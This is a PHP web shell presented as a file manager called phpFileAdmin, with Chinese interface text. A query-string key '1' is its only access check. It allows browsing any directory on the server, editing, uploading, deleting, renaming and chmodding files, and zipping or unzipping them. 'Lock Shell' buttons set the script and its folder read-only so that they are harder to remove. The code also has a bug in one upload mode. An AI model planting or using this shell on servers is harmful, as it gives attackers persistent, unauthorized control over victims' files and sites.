<?php
header("Content-type: text/html; charset=utf-8"); //设置字符编码为UTF-8
date_default_timezone_set('Asia/Shanghai'); // 设置默认时区

// 访问密码验证
$pwd = '1';
if (!isset($_GET[$pwd])) {
    exit('[Access Denied]');
}

$action = isset($_POST['action']) ? $_POST['action'] : '';
$submit = isset($_POST['submit']) ? $_POST['submit'] : '';

// 获取目录路径（允许跨目录访问）
$current_dir = realpath(isset($_GET['dir']) ? $_GET['dir'] : '.');

// 处理编辑文件的逻辑
$editing_file = null;
$file_content = '';
if (isset($_GET['edit'])) {
    $edit_file = $_GET['edit'];
    $editing_file = $current_dir . DIRECTORY_SEPARATOR . $edit_file;
    if (is_file($editing_file) && is_readable($editing_file)) {
        $file_content = file_get_contents($editing_file);
    }
}

// 处理保存文件的逻辑
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $action && in_array($action, array('save', 'save2', 'save3'))) {
    $save_file = $_POST['file'];
    $save_path = $current_dir . DIRECTORY_SEPARATOR . $save_file;
    $content = $_POST['content'];
    if (is_file($save_path) && is_writable($save_path)) {
        if ($_POST['action'] === 'save2') {
            rename($content, $save_path);
        } else if ($_POST['action'] === 'save3') {
            $handle = fopen($save_path, 'w');
            fwrite($handle, $content);
            fclose($handle);
        } else {
            file_put_contents($save_path, $content);
        }
    }
    header('Location: ?'. $pwd .'&dir=' . $current_dir);
    exit;
}

// 处理操作
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $target = isset($_POST['target']) ? $_POST['target'] : '';
    $target_path = $current_dir . DIRECTORY_SEPARATOR . $target;
    $upload_type = isset($_POST['uptype']) ? $_POST['uptype'] : '';

    // ZIP压缩函数
    function zipDirectory($source, $destination) {
        if (!extension_loaded('zip')) {
            return false;
        }
        $zip = new ZipArchive();
        if (!$zip->open($destination, ZipArchive::CREATE)) {
            return false;
        }
        $source = str_replace('\\', '/', realpath($source));
        if (is_dir($source)) {
            $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::LEAVES_ONLY);
            foreach ($files as $file) {
                if (!$file->isDir()) {
                    $filePath = str_replace('\\', '/', $file->getRealPath());
                    $relativePath = substr($filePath, strlen($source) + 1);
                    $zip->addFile($filePath, $relativePath);
                }
            }
        } elseif (is_file($source)) {
            $zip->addFile($source, basename($source));
        }
        return $zip->close();
    }
    
    // ZIP解压函数
    function unzipFile($zipFile, $destination) {
        if (!extension_loaded('zip')) {
            return false;
        }
        $zip = new ZipArchive();
        if (!$zip->open($zipFile)) {
            return false;
        }
        $result = $zip->extractTo($destination);
        $zip->close();
        return $result;
    }

    // 上传文件
    function uploadFile($current_dir, $uptype = 'up-1') {
        if (isset($_FILES['files']) && is_array($_FILES['files']['name'])) {
            for ($i = 0; $i < count($_FILES['files']['name']); $i++) {
                if ($_FILES['files']['error'][$i] === 0) {
                    $file_path = $current_dir . DIRECTORY_SEPARATOR . $_FILES['files']['name'][$i];
                    if ($uptype === 'up-2') {
                        rename($_FILES['files']['tmp_name'][$i], $file_path);
                    } else if ($uptype === 'up-3') {
                        $handle = fopen($file_path, 'w');
                        fwrite($handle, $$_FILES['files']['tmp_name'][$i]);
                        fclose($handle);
                    } else if ($uptype === 'up-4') {
                        copy($_FILES['files']['tmp_name'][$i], $file_path);
                        unlink($_FILES['files']['tmp_name'][$i]);
                    } else if ($uptype === 'up-5') {
                        file_put_contents($file_path, file_get_contents($_FILES['files']['tmp_name'][$i]));
                    } else {
                        move_uploaded_file($_FILES['files']['tmp_name'][$i], $file_path);
                    }
                }
            }
        }
    }

    switch ($action) {
        case 'upload':
            uploadFile($current_dir, $upload_type);
            break;
        case 'mkdir':
            mkdir($target_path);
            break;
        case 'create_file':
            if (!file_exists($target_path)) {
                touch($target_path);
            }
            break;
        case 'lock_shell':
            chmod(basename(__FILE__), octdec(555));
            chmod(dirname(__FILE__), octdec(555));
            break;
        case 'lock_shell_remove':
            chmod(basename(__FILE__), octdec(644));
            chmod(dirname(__FILE__), octdec(755));
            break;
        case 'delete':
            $target_path = urldecode($target_path);
            if (is_dir($target_path)) {
                function deleteDirectory($dir) {
                    $files = array_diff(scandir($dir), array('.', '..'));
                    foreach ($files as $file) {
                        $path = $dir . DIRECTORY_SEPARATOR . $file;
                        if (is_dir($path)) {
                            deleteDirectory($path);
                        } else {
                            unlink($path);
                        }
                    }
                    return rmdir($dir);
                }
                deleteDirectory($target_path);
            } else if (is_file($target_path)) {
                unlink($target_path);
            }
            break;
        case 'rename':
            $new_name = isset($_POST['new_name']) ? $_POST['new_name'] : '';
            if (!empty($new_name) && $new_name !== $target) {
                $new_path = $current_dir . DIRECTORY_SEPARATOR . $new_name;
                if (!file_exists($new_path)) {
                    rename($target_path, $new_path);
                }
            }
            break;
        case 'compress':
            if (file_exists($target_path)) {
                $zip_name = basename($target_path) . '.zip';
                $zip_path = $current_dir . DIRECTORY_SEPARATOR . $zip_name;
                zipDirectory($target_path, $zip_path);
            }
            break;
        case 'uncompress':
            if (is_file($target_path) && pathinfo($target_path, PATHINFO_EXTENSION) === 'zip') {
                $extract_dir = $current_dir . DIRECTORY_SEPARATOR . pathinfo($target_path, PATHINFO_FILENAME);
                if (!file_exists($extract_dir)) {
                    mkdir($extract_dir, 0777, true);
                    unzipFile($target_path, $extract_dir);
                }
            }
            break;
        case 'chmod':
            $new_perms = isset($_POST['new_perms']) ? $_POST['new_perms'] : '';
            if (!empty($new_perms) && preg_match('/^[0-7]{3,4}$/', $new_perms)) {
                chmod($target_path, octdec($new_perms));
            }
            break;
    }
    // 重定向到当前目录
    header('Location: ?'. $pwd .'&dir=' . $current_dir);
    exit;
}

// 列出目录内容
$items = scandir($current_dir);
$directories = array();
$files = array();

foreach ($items as $item) {
    if ($item !== '.' && $item !== '..') {
        $path = $current_dir . DIRECTORY_SEPARATOR . $item;
        $info = array(
            'name' => $item,
            'path' => $path,
            'size' => is_file($path) ? filesize($path) : 0,
            'modified' => filemtime($path),
            'permissions' => formatPermissions($path)
        );
        
        if (is_dir($path)) {
            $directories[] = $info;
        } else {
            $files[] = $info;
        }
    }
}

// 列表合并排序：文件夹在前，文件在后
$items = array_merge($directories, $files);

// 格式化大小函数
function formatSize($bytes) {
    if ($bytes == 0) return '0 B';
    $sizes = array('B', 'KB', 'MB', 'GB', 'TB');
    $i = floor(log($bytes, 1024));
    return round($bytes / pow(1024, $i), 2) . ' ' . $sizes[$i];
}

// 格式化权限函数
function formatPermissions($path) {
    $perms = fileperms($path);
    $numeric_perms = substr(decoct($perms), -3);
    return $numeric_perms;
}

// 检查文件权限
function getFileStatus($path) {
    if (is_writable($path) && is_readable($path)) {
        return "green";
    } elseif (!is_writable($path)) {
        return "red";
    } elseif (is_readable($path)) {
        return "#ddd";
    }
    return "#ddd";
}
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title></title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body { font-family: system-ui, Arial, "sans-serif"; margin: 20px; }
        h1 { color: #333; }
        a { text-decoration: none; color: blue; outline: none; }
        .path { background: #f5f5f5; padding: 10px; margin-bottom: 20px; }
        table { width: 100%; border-collapse: collapse; }
        th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
        th { background-color: #f2f2f2; }
        tr:hover { background-color: #f5f5f5; }
        .dir { font-weight: bold; }
        .action-link { display: inline-block; }
        .action-link button { border: none; background: none; padding: 0; cursor: pointer; color: blue; }
        .text-gap { display: inline-block; margin: 0 5px; color: #aeaeae; }
        .toolbar-form { margin-bottom: 15px; }
        .toolbar-form .toolbar-item {display: inline-block; margin: 0 13px 13px 0;}
        button { padding: 2px 8px; font-size: 14px; }
        input[type="text"] { padding: 4px 8px; font-size: 14px; }
        .editor-container { margin-bottom: 20px; border: 1px solid #ddd; padding: 10px; background-color: #f9f9f9; }
        .editor-header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 10px; }
        .editor-title { font-weight: bold; color: #333; }
        textarea { width: 100%; height: 300px; padding: 10px; font-family: monospace; font-size: 14px; border: 1px solid #ddd; resize: vertical; }
        .editor-actions { margin-top: 10px; text-align: right; }
    </style>
</head>
<body>
    <h1 style="margin-bottom: 20px;">phpFileAdmin</h1>
    <div class="path">
        <a href="?<?php echo $pwd; ?>&dir=<?php echo dirname($current_dir); ?>" style="font-weight: 700;">&lt; 返回上一级</a>
        <span class="text-gap">|</span>
        <span>当前路径: </span> <?php echo $current_dir; ?>
    </div>

    <!-- 文件编辑区域 -->
    <?php if ($editing_file): ?>
    <div class="editor-container">
        <div class="editor-header">
            <span class="editor-title">编辑文件: <?php echo rawurlencode(basename($editing_file)); ?></span>
            <a href="?<?php echo $pwd; ?>&dir=<?php echo $current_dir; ?>">取消编辑</a>
        </div>
        <form method="post">
            <input type="hidden" name="file" value="<?php echo basename($editing_file); ?>">
            <textarea name="content" spellcheck="false"><?php echo htmlspecialchars($file_content); ?></textarea>
            <div class="editor-actions">
                <button type="submit" name="action" value="save3">保存3</button>
                <button type="submit" name="action" value="save2">保存2</button>
                <button type="submit" name="action" value="save">保存文件</button>
            </div>
        </form>
    </div>
    <?php endif; ?>

    <!-- 工具栏 -->
    <div class="toolbar-form">
        <div class="toolbar-item">
            <button type="button" onclick="copyAllFileNames()">复制文件名称</button>
        </div>

        <?php
        // 定义上传类型配置
        $upload_types = array(
            array('value' => 'up-1', 'text' => '上传文件'),
            array('value' => 'up-2', 'text' => '上传文件v2'),
            array('value' => 'up-3', 'text' => '上传文件v3'),
            array('value' => 'up-4', 'text' => '上传文件v4'),
            array('value' => 'up-5', 'text' => '上传文件v5')
        );
        foreach ($upload_types as $index => $type) {
            $input_id = 'file-upload-input' . ($index === 0 ? '' : '-' . ($index + 1));
        ?>
        <form method="post" enctype="multipart/form-data" class="toolbar-item">
            <input type="hidden" name="action" value="upload">
            <input type="hidden" name="uptype" value="<?php echo $type['value']; ?>">
            <input type="file" name="files[]" id="<?php echo $input_id; ?>" style="display: none;" multiple>
            <button type="button" onclick="document.getElementById('<?php echo $input_id; ?>').click()"><?php echo $type['text']; ?></button>
        </form>
        <?php }
        ?>
        <script>
            // 文件选择后自动提交表单 - 统一事件监听
            document.querySelectorAll('input[name="files[]"]').forEach(function(input) {
                input.addEventListener('change', function(e) {
                    if (e.target.files.length > 0) {
                        this.form.submit();
                    }
                });
            });
        </script>

        <form method="post" class="toolbar-item">
            <input type="hidden" name="action" value="compress">
            <input type="hidden" name="target" value="">
            <button type="submit">压缩当前文件夹</button>
        </form>
        <form method="post" class="toolbar-item">
            <input type="hidden" name="action" value="lock_shell">
            <button type="submit">锁定 Shell</button>
        </form>
        <form method="post" class="toolbar-item">
            <input type="hidden" name="action" value="lock_shell_remove">
            <button type="submit">解锁 Shell</button>
        </form>

        <div>
            <form method="post" class="toolbar-item">
                <input type="hidden" name="action" value="mkdir">
                <input type="text" name="target" placeholder="文件夹名称" required />
                <button type="submit">创建文件夹</button>
            </form>
            <form method="post" class="toolbar-item">
                <input type="hidden" name="action" value="create_file">
                <input type="text" name="target" placeholder="文件名称" required />
                <button type="submit">创建文件</button>
            </form>
        </div>
    </div>

    <!-- 目录列表 -->
    <div style="overflow-x: auto; padding-bottom: 30px; white-space: nowrap;">
        <table>
            <tr>
                <th width="45%">文件名称</th>
                <th>权限</th>
                <th>大小</th>
                <th>修改时间</th>
                <th>操作</th>
            </tr>
            
            <!-- 目标列表（文件夹在前，文件在后） -->
            <?php foreach ($items as $item): ?>
                <?php $is_dir = is_dir($item['path']); ?>
                <tr>
                    <td <?php if ($is_dir): ?>class="dir"<?php endif; ?> style="border-left: 3px solid <?php echo getFileStatus($item['path']); ?>">
                        <?php if ($is_dir): ?>
                            <a href="?<?php echo $pwd; ?>&dir=<?php echo $item['path']; ?>">
                                📁 <?php echo rawurlencode($item['name']); ?>
                            </a>
                        <?php elseif (!$is_dir && pathinfo($item['name'], PATHINFO_EXTENSION) === 'zip'): ?>
                            📚 <?php echo rawurlencode($item['name']); ?>
                        <?php else: ?>
                            📄 <?php echo rawurlencode($item['name']); ?>
                        <?php endif; ?>
                    </td>
                    <td style="font-weight: 600; color: <?php echo getFileStatus($item['path']); ?>"><?php echo $item['permissions']; ?></td>
                    <td><?php echo $is_dir ? '-' : formatSize($item['size']); ?></td>
                    <td><?php echo date('Y-m-d H:i:s', $item['modified']); ?></td>
                    <td>
                        <?php if (!$is_dir): ?>
                            <a class="action-link" href="?<?php echo $pwd; ?>&dir=<?php echo $current_dir; ?>&edit=<?php echo rawurlencode($item['name']); ?>">
                                <button>编辑</button>
                            </a>
                            <span class="text-gap">|</span>
                        <?php endif; ?>

                        <a class="action-link" onclick="renameItem('<?php echo rawurlencode($item['name']); ?>', <?php echo $is_dir ? 'true' : 'false'; ?>)">
                            <button>重命名</button>
                        </a>
                        <span class="text-gap">|</span>

                        <a class="action-link" onclick="changePermissions('<?php echo rawurlencode($item['name']); ?>', <?php echo $is_dir ? 'true' : 'false'; ?>)">
                            <button>权限</button>
                        </a>
                        <span class="text-gap">|</span>

                        <?php if (!$is_dir && pathinfo($item['name'], PATHINFO_EXTENSION) === 'zip'): ?>
                        <form class="action-link" method="post" onsubmit="return confirm('确定要解压这个文件吗？')">
                            <input type="hidden" name="action" value="uncompress">
                            <input type="hidden" name="target" value="<?php echo rawurlencode($item['name']); ?>">
                            <button type="submit">解压</button>
                        </form>
                        <span class="text-gap">|</span>
                        <?php else: ?>
                        <form class="action-link" method="post" onsubmit="return confirm('确定要压缩这个<?php echo $is_dir ? '文件夹' : '文件'; ?>吗？')">
                            <input type="hidden" name="action" value="compress">
                            <input type="hidden" name="target" value="<?php echo rawurlencode($item['name']); ?>">
                            <button type="submit">压缩</button>
                        </form>
                        <span class="text-gap">|</span>
                        <?php endif; ?>

                        <form class="action-link" method="post" onsubmit="return confirm('确定要删除这个<?php echo $is_dir ? '文件夹' : '文件'; ?>吗？')">
                            <input type="hidden" name="action" value="delete">
                            <input type="hidden" name="target" value="<?php echo rawurlencode($item['name']); ?>">
                            <button type="submit" style="color: red;">删除</button>
                        </form>
                    </td>
                </tr>
            <?php endforeach; ?>
        </table>
    </div>

    <script>
        // 从DOM中提取文件名列表
        var fileNamesLists = Array.from(document.querySelectorAll('table tr:not(:first-child)')).map(function(row) {
            var nameCell = row.querySelector('td:first-child');
            var nameText = nameCell.textContent.trim();
            // 移除开头的特定 emoji 和空格
            nameText = nameText.replace(/^[\u{1F4C1}\u{1F4DA}\u{1F4C4}\s]+/u, '');
            return nameText;
        });

        // 点击重命名按钮时触发
        function renameItem(currentName, isDir) {
            const newName = prompt('请输入新的' + (isDir ? '文件夹' : '文件') + '名称:', currentName);
            if (newName && newName !== currentName && newName.trim() !== '') {
                // 创建表单并添加字段
                const form = document.createElement('form');
                form.method = 'post';
                form.style.display = 'none';
                
                // 创建和添加输入字段
                const addField = (name, value) => {
                    const input = document.createElement('input');
                    input.type = 'hidden';
                    input.name = name;
                    input.value = value;
                    form.appendChild(input);
                };
                
                addField('action', 'rename');
                addField('target', currentName);
                addField('new_name', newName.trim());
                
                document.body.appendChild(form);
                form.submit();
            }
        }

        // 点击修改权限按钮时触发
        function changePermissions(currentName, isDir) {
            const newPerms = prompt('请输入新的权限值 (例如 755):', '');
            if (newPerms && newPerms.match(/^[0-7]{3,4}$/)) {
                // 创建表单并添加字段
                const form = document.createElement('form');
                form.method = 'post';
                form.style.display = 'none';
                
                // 创建和添加输入字段
                const addField = (name, value) => {
                    const input = document.createElement('input');
                    input.type = 'hidden';
                    input.name = name;
                    input.value = value;
                    form.appendChild(input);
                };
                
                addField('action', 'chmod');
                addField('target', currentName);
                addField('new_perms', newPerms);
                
                document.body.appendChild(form);
                form.submit();
            } else if (newPerms) {
                alert('无效的权限值，请输入 3-4 位的八进制数字 (0-7)');
            }
        }

        // 复制所有文件名到剪贴板
        function copyAllFileNames() {
            // 验证文件名列表
            if (!window.fileNamesLists || !Array.isArray(window.fileNamesLists)) {
                alert('无法获取文件名列表');
                return;
            }
            
            // 解码文件名，过滤空字符串
            const textToCopy = fileNamesLists
                .filter(name => name.trim() !== '')
                .map(name => {
                    try { return decodeURIComponent(name); }
                    catch { return name; }
                })
                .join('\n');

            // 复制到剪贴板
            const textarea = Object.assign(document.createElement('textarea'), {
                value: textToCopy,
                style: { position: 'fixed', opacity: '0' }
            });
            document.body.appendChild(textarea);
            textarea.select();
            
            try {
                document.execCommand('copy');
                alert("复制成功");
            } catch (err) {
                console.error('复制失败:', err);
            } finally {
                document.body.removeChild(textarea);
            }
        }
    </script>
</body>
</html>